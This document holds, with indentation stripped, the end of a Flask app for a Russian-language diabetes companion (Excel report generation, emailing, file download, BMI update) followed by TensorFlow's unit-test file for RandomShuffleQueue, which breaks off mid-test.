merged_cells_range = sheet4.merged_cells.ranges
for merged_cell in merged_cells_range:
merged_cell.shift(0, 2)
sheet4.insert_rows(1, 2)
sheet4['A2'] = 'Предсказание сахара после приемов пищи'
sheet4['A1'] = '%s ИМТ = %s' % (fio[0][0], BMI0)
sheet4.merge_cells('A1:G1')
sheet4['A2'].border = thin_border
sheet4['A2'].fill = PatternFill("solid", fgColor="fafad2")
sheet4['A2'].font = Font(bold=True)
sheet4.merge_cells('A2:G2')
sheet4.protection.set_password('test')
wb.save(filename)
wb.close()
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
@app.route('/email', methods=['GET', 'POST'])
@login_required
def email():
# Отправляем отчет по почте отчет
if request.method == 'POST':
dirname = os.path.dirname(__file__)
filename = os.path.join(dirname, '%s.xlsx' % session["username"])
# Получили список имейлов на которые надо отправить
mail1 = request.form.getlist('email_sendto')
do_tb()
# Отправляем по почте
msg = Message('ДиаКомпаньон', sender='pochtadiacomp@gmail.com',
recipients=mail1)
msg.subject = "Никнейм пользователя: %s" % session["username"]
msg.body = 'Электронный отчет пользователя: %s' % fio[0][0]
with app.open_resource(filename) as attach:
msg.attach('%s.xlsx' % session["username"], 'sheet/xlsx',
attach.read())
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
try:
os.remove(filename)
except FileNotFoundError:
print('FileNotFoundError: нечего удалять')
return redirect(url_for('lk'))
@app.route('/sendto', methods=['GET', 'POST'])
@login_required
def download_file():
if request.method == 'POST':
dirname = os.path.dirname(__file__)
file_path = os.path.join(dirname, '%s.xlsx' % session["username"])
do_tb()
# Для Linux систем
# @after_this_request
# def removing(response):
# os.remove(file_path)
# return response
return send_file(file_path, as_attachment=True)
@app.route("/setMBI", methods=['GET', 'POST'])
@login_required
def setMBI():
if request.method == 'POST':
jsonBMI = request.get_json()
path = os.path.dirname(os.path.abspath(__file__))
db_17 = os.path.join(path, 'diacompanion.db')
con = sqlite3.connect(db_17)
cur = con.cursor()
cur.execute("""UPDATE user SET BMI = ? WHERE id = ?""",
(jsonBMI['BMI'], session["user_id"]))
con.commit()
con.close()
list2 = jsonify({"Message": "ИМТ записан"})
response = make_response(list2, 200)
return response
@app.route("/add_smth", methods=['GET', 'POST'])
@login_required
def add_smth():
if request.method == 'POST':
a101 = 'lala1'
print(a101)
return redirect(url_for('lk'))
if __name__ == '__main__':
app.run(debug=True)
|
random_shuffle_queue_test.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.data_flow_ops.Queue."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import random
import time
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes as dtypes_lib
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import test_util
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging
@test_util.run_v1_only("RandomShuffleQueue removed from v2")
class RandomShuffleQueueTest(test.TestCase):
def setUp(self):
# Useful for debugging when a test times out.
super(RandomShuffleQueueTest, self).setUp()
tf_logging.error("Starting: %s", self._testMethodName)
def tearDown(self):
super(RandomShuffleQueueTest, self).tearDown()
tf_logging.error("Finished: %s", self._testMethodName)
def testEnqueue(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32)
enqueue_op = q.enqueue((10.0,))
self.assertAllEqual(0, q.size().eval())
enqueue_op.run()
self.assertAllEqual(1, q.size().eval())
def testEnqueueWithShape(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=tensor_shape.TensorShape([3, 2]))
enqueue_correct_op = q.enqueue(([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]],))
enqueue_correct_op.run()
self.assertAllEqual(1, q.size().eval())
with self.assertRaises(ValueError):
q.enqueue(([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]],))
def testEnqueueManyWithShape(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(
10, 5, [dtypes_lib.int32, dtypes_lib.int32], shapes=[(), (2,)])
q.enqueue_many([[1, 2, 3, 4], [[1, 1], [2, 2], [3, 3], [4, 4]]]).run()
self.assertAllEqual(4, q.size().eval())
q2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, shapes=tensor_shape.TensorShape([3]))
q2.enqueue(([1, 2, 3],))
q2.enqueue_many(([[1, 2, 3]],))
def testScalarShapes(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, [dtypes_lib.int32, dtypes_lib.int32], shapes=[(), (1,)])
q.enqueue_many([[1, 2, 3, 4], [[5], [6], [7], [8]]]).run()
q.enqueue([9, [10]]).run()
dequeue_t = q.dequeue()
results = []
for _ in range(2):
a, b = self.evaluate(dequeue_t)
results.append((a, b))
a, b = self.evaluate(q.dequeue_many(3))
for i in range(3):
results.append((a[i], b[i]))
self.assertItemsEqual([(1, [5]), (2, [6]), (3, [7]), (4, [8]), (9, [10])],
results)
def testParallelEnqueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
# Run one producer thread for each element in elems.
def enqueue(enqueue_op):
self.evaluate(enqueue_op)
threads = [
self.checkedThread(
target=enqueue, args=(e,)) for e in enqueue_ops
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
# Dequeue every element using a single thread.
results = []
for _ in xrange(len(elems)):
results.append(dequeued_t.eval())
self.assertItemsEqual(elems, results)
def testParallelDequeue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
# Enqueue every element using a single thread.
for enqueue_op in enqueue_ops:
enqueue_op.run()
# Run one consumer thread for each element in elems.
results = []
def dequeue():
results.append(self.evaluate(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in enqueue_ops]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, results)
def testDequeue(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
vals = [dequeued_t.eval() for _ in xrange(len(elems))]
self.assertItemsEqual(elems, vals)
def testEnqueueAndBlockingDequeue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(3, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
def enqueue():
# The enqueue_ops should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
for enqueue_op in enqueue_ops:
self.evaluate(enqueue_op)
results = []
def dequeue():
for _ in xrange(len(elems)):
results.append(self.evaluate(dequeued_t))
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
self.assertItemsEqual(elems, results)
def testMultiEnqueueAndDequeue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, (dtypes_lib.int32, dtypes_lib.float32))
elems = [(5, 10.0), (10, 20.0), (15, 30.0)]
enqueue_ops = [q.enqueue((x, y)) for x, y in elems]
dequeued_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
results = []
for _ in xrange(len(elems)):
x, y = self.evaluate(dequeued_t)
results.append((x, y))
self.assertItemsEqual(elems, results)
def testQueueSizeEmpty(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32)
self.assertEqual(0, q.size().eval())
def testQueueSizeAfterEnqueueAndDequeue(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue()
size = q.size()
self.assertEqual([], size.get_shape())
enqueue_op.run()
self.assertEqual([1], self.evaluate(size))
dequeued_t.op.run()
self.assertEqual([0], self.evaluate(size))
def testEnqueueMany(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue()
enqueue_op.run()
enqueue_op.run()
results = []
for _ in range(8):
results.append(dequeued_t.eval())
self.assertItemsEqual(elems + elems, results)
def testEmptyEnqueueMany(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32)
empty_t = constant_op.constant(
[], dtype=dtypes_lib.float32, shape=[0, 2, 3])
enqueue_op = q.enqueue_many((empty_t,))
size_t = q.size()
self.assertEqual(0, self.evaluate(size_t))
enqueue_op.run()
self.assertEqual(0, self.evaluate(size_t))
def testEmptyDequeueMany(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, shapes=())
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue_many(0)
self.assertEqual([], self.evaluate(dequeued_t).tolist())
enqueue_op.run()
self.assertEqual([], self.evaluate(dequeued_t).tolist())
def testEmptyDequeueUpTo(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, shapes=())
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue_up_to(0)
self.assertEqual([], self.evaluate(dequeued_t).tolist())
enqueue_op.run()
self.assertEqual([], self.evaluate(dequeued_t).tolist())
def testEmptyDequeueManyWithNoShape(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
enqueue_op = q.enqueue((constant_op.constant(
[10.0, 20.0], shape=(1, 2)),))
dequeued_t = q.dequeue_many(0)
# Expect the operation to fail due to the shape not being constrained.
with self.assertRaisesOpError(
"require the components to have specified shapes"):
self.evaluate(dequeued_t)
enqueue_op.run()
# RandomShuffleQueue does not make any attempt to support DequeueMany
# with unspecified shapes, even if a shape could be inferred from the
# elements enqueued.
with self.assertRaisesOpError(
"require the components to have specified shapes"):
self.evaluate(dequeued_t)
def testEmptyDequeueUpToWithNoShape(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
enqueue_op = q.enqueue((constant_op.constant(
[10.0, 20.0], shape=(1, 2)),))
dequeued_t = q.dequeue_up_to(0)
# Expect the operation to fail due to the shape not being constrained.
with self.assertRaisesOpError(
"require the components to have specified shapes"):
self.evaluate(dequeued_t)
enqueue_op.run()
# RandomShuffleQueue does not make any attempt to support DequeueUpTo
# with unspecified shapes, even if a shape could be inferred from the
# elements enqueued.
with self.assertRaisesOpError(
"require the components to have specified shapes"):
self.evaluate(dequeued_t)
def testMultiEnqueueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, (dtypes_lib.float32, dtypes_lib.int32))
float_elems = [10.0, 20.0, 30.0, 40.0]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue()
enqueue_op.run()
enqueue_op.run()
results = []
for _ in range(8):
float_val, int_val = self.evaluate(dequeued_t)
results.append((float_val, [int_val[0], int_val[1]]))
expected = list(zip(float_elems, int_elems)) * 2
self.assertItemsEqual(expected, results)
def testDequeueMany(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(5)
enqueue_op.run()
results = self.evaluate(dequeued_t).tolist()
results.extend(dequeued_t.eval())
self.assertItemsEqual(elems, results)
def testDequeueUpToNoBlocking(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_up_to(5)
enqueue_op.run()
results = self.evaluate(dequeued_t).tolist()
results.extend(dequeued_t.eval())
self.assertItemsEqual(elems, results)
def testMultiDequeueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, (dtypes_lib.float32, dtypes_lib.int32), shapes=((), (2,)))
float_elems = [
10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0
]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10], [11, 12], [13, 14],
[15, 16], [17, 18], [19, 20]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue_many(4)
dequeued_single_t = q.dequeue()
enqueue_op.run()
results = []
float_val, int_val = self.evaluate(dequeued_t)
self.assertEqual(float_val.shape, dequeued_t[0].get_shape())
self.assertEqual(int_val.shape, dequeued_t[1].get_shape())
results.extend(zip(float_val, int_val.tolist()))
float_val, int_val = self.evaluate(dequeued_t)
results.extend(zip(float_val, int_val.tolist()))
float_val, int_val = self.evaluate(dequeued_single_t)
self.assertEqual(float_val.shape, dequeued_single_t[0].get_shape())
self.assertEqual(int_val.shape, dequeued_single_t[1].get_shape())
results.append((float_val, int_val.tolist()))
float_val, int_val = self.evaluate(dequeued_single_t)
results.append((float_val, int_val.tolist()))
self.assertItemsEqual(zip(float_elems, int_elems), results)
def testMultiDequeueUpToNoBlocking(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, (dtypes_lib.float32, dtypes_lib.int32), shapes=((), (2,)))
float_elems = [
10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0
]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10], [11, 12], [13, 14],
[15, 16], [17, 18], [19, 20]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue_up_to(4)
dequeued_single_t = q.dequeue()
enqueue_op.run()
results = []
float_val, int_val = self.evaluate(dequeued_t)
# dequeue_up_to has undefined shape.
self.assertEqual([None], dequeued_t[0].get_shape().as_list())
self.assertEqual([None, 2], dequeued_t[1].get_shape().as_list())
results.extend(zip(float_val, int_val.tolist()))
float_val, int_val = self.evaluate(dequeued_t)
results.extend(zip(float_val, int_val.tolist()))
float_val, int_val = self.evaluate(dequeued_single_t)
self.assertEqual(float_val.shape, dequeued_single_t[0].get_shape())
self.assertEqual(int_val.shape, dequeued_single_t[1].get_shape())
results.append((float_val, int_val.tolist()))
float_val, int_val = self.evaluate(dequeued_single_t)
results.append((float_val, int_val.tolist()))
self.assertItemsEqual(zip(float_elems, int_elems), results)
def testHighDimension(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.int32, (
(4, 4, 4, 4)))
elems = np.array([[[[[x] * 4] * 4] * 4] * 4 for x in range(10)], np.int32)
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(10)
enqueue_op.run()
self.assertItemsEqual(dequeued_t.eval().tolist(), elems.tolist())
def testParallelEnqueueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
1000, 0, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in range(100)]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(1000)
# Enqueue 100 items in parallel on 10 threads.
def enqueue():
self.evaluate(enqueue_op)
threads = [self.checkedThread(target=enqueue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(dequeued_t.eval(), elems * 10)
def testParallelDequeueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
1000, 0, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in range(1000)]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(100)
enqueue_op.run()
# Dequeue 100 items in parallel on 10 threads.
dequeued_elems = []
def dequeue():
dequeued_elems.extend(self.evaluate(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testParallelDequeueUpTo(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
1000, 0, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in range(1000)]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_up_to(100)
enqueue_op.run()
# Dequeue 100 items in parallel on 10 threads.
dequeued_elems = []
def dequeue():
dequeued_elems.extend(self.evaluate(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testParallelDequeueUpToRandomPartition(self):
with self.cached_session() as sess:
dequeue_sizes = [random.randint(50, 150) for _ in xrange(10)]
total_elements = sum(dequeue_sizes)
q = data_flow_ops.RandomShuffleQueue(
total_elements, 0, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in xrange(total_elements)]
enqueue_op = q.enqueue_many((elems,))
dequeue_ops = [q.dequeue_up_to(size) for size in dequeue_sizes]
enqueue_op.run()
# Dequeue random number of items in parallel on 10 threads.
dequeued_elems = []
def dequeue(dequeue_op):
dequeued_elems.extend(self.evaluate(dequeue_op))
threads = []
for dequeue_op in dequeue_ops:
threads.append(self.checkedThread(target=dequeue, args=(dequeue_op,)))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testBlockingDequeueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(4)
dequeued_elems = []
def enqueue():
# The enqueue_op should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
self.evaluate(enqueue_op)
def dequeue():
dequeued_elems.extend(self.evaluate(dequeued_t).tolist())
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testBlockingDequeueUpTo(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_up_to(4)
dequeued_elems = []
def enqueue():
# The enqueue_op should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
self.evaluate(enqueue_op)
def dequeue():
dequeued_elems.extend(self.evaluate(dequeued_t).tolist())
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testDequeueManyWithTensorParameter(self):
with self.cached_session():
# Define a first queue that contains integer counts.
dequeue_counts = [random.randint(1, 10) for _ in range(100)]
count_q = data_flow_ops.RandomShuffleQueue(100, 0, dtypes_lib.int32)
enqueue_counts_op = count_q.enqueue_many((dequeue_counts,))
total_count = sum(dequeue_counts)
# Define a second queue that contains total_count elements.
elems = [random.randint(0, 100) for _ in range(total_count)]
q = data_flow_ops.RandomShuffleQueue(total_count, 0, dtypes_lib.int32, (
(),))
enqueue_elems_op = q.enqueue_many((elems,))
# Define a subgraph that first dequeues a count, then DequeuesMany
# that number of elements.
dequeued_t = q.dequeue_many(count_q.dequeue())
enqueue_counts_op.run()
enqueue_elems_op.run()
dequeued_elems = []
for _ in dequeue_counts:
dequeued_elems.extend(dequeued_t.eval())
self.assertItemsEqual(elems, dequeued_elems)
def testDequeueUpToWithTensorParameter(self):
with self.cached_session():
# Define a first queue that contains integer counts.
dequeue_counts = [random.randint(1, 10) for _ in range(100)]
count_q = data_flow_ops.RandomShuffleQueue(100, 0, dtypes_lib.int32)
enqueue_counts_op = count_q.enqueue_many((dequeue_counts,))
total_count = sum(dequeue_counts)
# Define a second queue that contains total_count elements.
elems = [random.randint(0, 100) for _ in range(total_count)]
q = data_flow_ops.RandomShuffleQueue(total_count, 0, dtypes_lib.int32, (
(),))
enqueue_elems_op = q.enqueue_many((elems,))
# Define a subgraph that first dequeues a count, then DequeuesUpTo
# that number of elements.
dequeued_t = q.dequeue_up_to(count_q.dequeue())
enqueue_counts_op.run()
enqueue_elems_op.run()
dequeued_elems = []
for _ in dequeue_counts:
dequeued_elems.extend(dequeued_t.eval())
self.assertItemsEqual(elems, dequeued_elems)
def testDequeueFromClosedQueue(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 2, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
close_op.run()
results = [dequeued_t.eval() for _ in elems]
expected = [[elem] for elem in elems]
self.assertItemsEqual(expected, results)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
def testBlockingDequeueFromClosedQueue(self):
with self.cached_session() as sess:
min_size = 2
q = data_flow_ops.RandomShuffleQueue(10, min_size, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
results = []
# Manually dequeue until we hit min_size.
results.append(self.evaluate(dequeued_t))
results.append(self.evaluate(dequeued_t))
def blocking_dequeue():
results.append(self.evaluate(dequeued_t))
results.append(self.evaluate(dequeued_t))
self.assertItemsEqual(elems, results)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
dequeue_thread = self.checkedThread(target=blocking_dequeue)
dequeue_thread.start()
time.sleep(0.1)
# The dequeue thread blocked when it hit the min_size requirement.
self.assertEqual(len(results), 2)
close_op.run()
dequeue_thread.join()
# Once the queue is closed, the min_size requirement is lifted.
self.assertEqual(len(results), 4)
def testBlockingDequeueFromClosedEmptyQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
close_op = q.close()
dequeued_t = q.dequeue()
finished = [] # Needs to be a mutable type
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
finished.append(True)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
self.assertEqual(len(finished), 0)
close_op.run()
dequeue_thread.join()
self.assertEqual(len(finished), 1)
def testBlockingDequeueManyFromClosedQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_many(4)
enqueue_op.run()
progress = [] # Must be mutable
def dequeue():
self.assertItemsEqual(elems, self.evaluate(dequeued_t))
progress.append(1)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
progress.append(2)
self.assertEqual(len(progress), 0)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
for _ in range(100):
time.sleep(0.01)
if len(progress) == 1:
break
self.assertEqual(len(progress), 1)
time.sleep(0.01)
close_op.run()
dequeue_thread.join()
self.assertEqual(len(progress), 2)
def testBlockingDequeueUpToFromClosedQueueReturnsRemainder(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_up_to(3)
enqueue_op.run()
results = []
def dequeue():
results.extend(self.evaluate(dequeued_t))
self.assertEquals(3, len(results))
results.extend(self.evaluate(dequeued_t))
self.assertEquals(4, len(results))
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
self.assertItemsEqual(results, elems)
def testBlockingDequeueUpToSmallerThanMinAfterDequeue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
capacity=10,
min_after_dequeue=2,
dtypes=dtypes_lib.float32,
shapes=((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_up_to(3)
enqueue_op.run()
results = []
def dequeue():
results.extend(self.evaluate(dequeued_t))
self.assertEquals(3, len(results))
# min_after_dequeue is 2, we ask for 3 elements, and we end up only
# getting the remaining 1.
results.extend(self.evaluate(dequeued_t))
self.assertEquals(4, len(results))
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
self.assertItemsEqual(results, elems)
def testBlockingDequeueManyFromClosedQueueWithElementsRemaining(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_many(3)
cleanup_dequeue_t = q.dequeue_many(q.size())
enqueue_op.run()
results = []
def dequeue():
results.extend(self.evaluate(dequeued_t))
self.assertEqual(len(results), 3)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
# While the last dequeue failed, we want to insure that it returns
# any elements that it potentially reserved to dequeue. Thus the
# next cleanup should return a single element.
results.extend(self.evaluate(cleanup_dequeue_t))
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
self.assertEqual(len(results), 4)
def testBlockingDequeueManyFromClosedEmptyQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32, ((),))
close_op = q.close()
dequeued_t = q.dequeue_many(4)
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testBlockingDequeueUpToFromClosedEmptyQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32, ((),))
close_op = q.close()
dequeued_t = q.dequeue_up_to(4)
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testEnqueueToClosedQueue(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 4, dtypes_lib.float32)
enqueue_op = q.enqueue((10.0,))
close_op = q.close()
enqueue_op.run()
close_op.run()
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.CancelledError, "is closed"):
enqueue_op.run()
def testEnqueueManyToClosedQueue(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
enqueue_op.run()
close_op.run()
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.CancelledError, "is closed"):
